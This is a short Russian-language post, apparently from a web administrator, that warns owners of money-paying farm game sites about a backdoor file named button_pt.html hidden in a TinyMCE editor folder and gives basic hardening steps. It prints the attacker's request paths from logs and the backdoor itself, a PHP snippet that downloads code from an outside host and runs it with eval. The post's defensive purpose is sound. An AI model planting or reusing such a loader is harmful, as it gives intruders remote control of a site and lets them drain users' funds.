Уязвимость с кнопкой button_pt.html

Сегодня поговорим о такой вещи как мошенники выводят обычно деньги с кошельков игр с выводом денег не входя ни в панель администратора ни делая аккаунтов. Я не собираюсь обучать и рассказывать в подробностях как это сделать, что бы не было желающих поживиться за чужой счёт а расскажу просто как себя обезопасить начинающему администратору фермы.

Изучив логи запросов домена одного из обратившихся клиентов я заметил что проблема как таковая лежит в панели управления его игры.

Кнопка button_pt.html

GET /js/editor/jscripts/tiny_mce/themes/simple/skins/o2k7/img/images/license.php?money

GET /js/editor/jscripts/tiny_mce/themes/simple/skins/o2k7/img/button_pt.html?money&pay=P3868870

Если у вас обнаруживается такой скрипт запроса у себя в файлах то поздравляю вы обладатель сайта с уязвимостью. Данная уязвимость не обязательно может быть именно HTML или вообще php файлом.

Сейчас очень часто вирусы выкладывают в изображения то есть этот скрипт еще может храниться и в простой картинке которая есть на вашем сайте проверьте все иконки да и вообще все картинки вашего скрипт.

Вот к чему ведет данный скрипт:

 button_pt.html:<?PHP 
$content = file_get_contents("http://fruit-farm.org/return.php"); 
eval($content); 
?>  

То есть при данном запросе идет отдельная страница с кнопкой button_pt.html ( бабло кнопка) с которой мошенники и выводят все деньги за считанные секунды.

Принимаем меры:

Самый простой способ проверить все скрипты на уязвимость здесь

Далее если все чисто то на этом не стоит останавливаться а нужно обезопасить себя.

1. Поставить права на папку tiny_mce (права доступа на 400) а лучше удалить ее к чертям эту папку.

2. Проверить фильтрацию на всех модулях если нет то сделать.

На этом все, будьте всегда внимательно проверяйте скачанные скрипты на уязвимости.